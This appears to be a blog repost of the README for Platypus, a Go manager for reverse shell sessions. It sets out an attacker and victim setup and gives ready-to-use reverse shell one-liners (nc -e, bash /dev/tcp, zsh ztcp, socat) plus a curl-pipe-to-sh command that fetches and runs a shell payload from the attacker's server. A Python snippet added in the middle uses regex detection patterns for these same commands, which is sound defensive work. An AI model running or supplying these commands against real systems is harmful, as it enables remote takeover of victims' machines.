Friday, 2 October 2020

Platypus

  A modern manager for multiple reverse shell sessions, written in Go.

A modern terminal-based manager for multiple reverse shell sessions/clients, written in Go.

Features

  •  Multiple service listening ports
  •  Multiple client connections
  •  RESTful API
  •  Reverse shell as a service (pop a reverse shell without having to remember tedious commands)
  •  File download/upload with a progress bar
  •  Fully interactive shell
    •  Using vim gracefully in a reverse shell
    •  Using CTRL+C and CTRL+Z in a reverse shell

Getting Started

There are multiple ways to run this tool; feel free to choose one of the following methods.

Run Platypus from source code

git clone https://github.com/WangYihang/Platypus
cd Platypus
go run platypus.go

Run Platypus from release binaries

  1. Download a prebuilt Platypus binary from HERE
  2. Run the downloaded executable file

Run Platypus from Docker

# Build your Docker image
docker build -t platypus .

# Start Platypus in a Docker container; don't forget to create the port mapping
docker run -it -p 9999:9999 platypus

Usage

Network Topology

  • Attacker IP: 192.168.174.132
    • Reverse Shell Service: 0.0.0.0:8080
    • RESTful Service: 127.0.0.1:9090
  • Victim IP: 192.168.174.128

Connecting victim and attacker

A reverse shell scenario involves both the attacker's side and the victim's side, so this usage guide is separated into two views: the attacker's view and the victim's view.

Attacker's view

  1. First, the attacker starts Platypus and listens on some port (e.g. 8080).

  2. Then the victim is attacked by the attacker, and a reverse shell command is executed on the victim's machine.

Victim's view

The victim machine is compromised and executes the malicious command, which opens a reverse shell to the attacker.

Here are some reverse shell commands for various platforms.

nc -e /bin/bash 192.168.174.132 8080
bash -c 'bash -i >/dev/tcp/192.168.174.132/8080 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.174.132 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.174.132:8080

Controlling the victim

List all victims

Select a victim

Interactive shell

Download file

Upload file

Other useful features

Reverse shell as a Service

USAGE

NOTICE: ONLY WORKS ON *NIX

The command bash -c "bash -i >/dev/tcp/8.8.8.8/1337 0>&1" is equivalent to curl http://192.168.174.132:8080/8.8.8.8/1337 | sh. This feature makes it possible to redirect a new reverse shell to another IP and port without typing out the tedious reverse shell command.

If you just want to pop a reverse shell to the listening port of Platypus, the parameter (8.8.8.8/1337) can be omitted, like this:

curl http://192.168.174.132:8080/ | sh

Once the command is executed, the reverse shell session appears in the Platypus instance listening on 192.168.174.132:8080.
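For defenders, the four one-liners in the victim's view and the curl ... | sh form above share recognizable command-line shapes. The following is an added detection example, not part of Platypus or the original post: it matches those shapes in process command lines. The signature names, the regexes and the sample lines are constructed for illustration, and the fetch-pipe-shell signature also matches legitimate installer one-liners, so hits need triage.

```python
import re

# Signatures for the command shapes shown on this page (assumed names).
# Heuristics only: they match the shape of a command line, not intent.
SIGNATURES = {
    "nc-exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[a-zA-Z]*e\s+\S+"),
    "dev-tcp-redirect": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    "zsh-ztcp": re.compile(r"\bzmodload\s+zsh/net/tcp\b|\bztcp\s+\S+\s+\d+"),
    "socat-exec-tcp": re.compile(
        r"\bsocat\b(?=.*\bexec:)(?=.*\btcp\d?(?:-connect)?:)", re.I),
    "fetch-pipe-shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z|da)?sh\b"),
}

def classify(cmdline):
    """Return the sorted names of every signature the command line matches."""
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(cmdline))

def scan(cmdlines):
    """Map the index of each suspicious command line to its signatures."""
    hits = {}
    for i, cmd in enumerate(cmdlines):
        names = classify(cmd)
        if names:
            hits[i] = names
    return hits

# Constructed sample of process command lines, e.g. taken from execve
# audit records. The first five reuse the commands shown on this page.
SAMPLE = [
    "nc -e /bin/bash 192.168.174.132 8080",
    "bash -c 'bash -i >/dev/tcp/192.168.174.132/8080 0>&1'",
    "zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.174.132 8080 "
    "&& zsh >&$REPLY 2>&$REPLY 0>&$REPLY'",
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane "
    "tcp:192.168.174.132:8080",
    "curl http://192.168.174.132:8080/ | sh",
    "nc -zv 10.0.0.5 22",                            # benign port check
    "socat tcp-listen:8443,fork tcp:10.0.0.2:443",   # benign port forward
    "curl -s https://example.com/health | grep ok",  # benign pipe
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE).items():
        print(f"{names}: {SAMPLE[idx]}")
```
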

RESTful API

USAGE

Demonstration is to be done.

Using VIM in Reverse Shell (Only on Linux)

Demonstration is to be done.

Other Materials

from https://github.com/WangYihang/Platypus
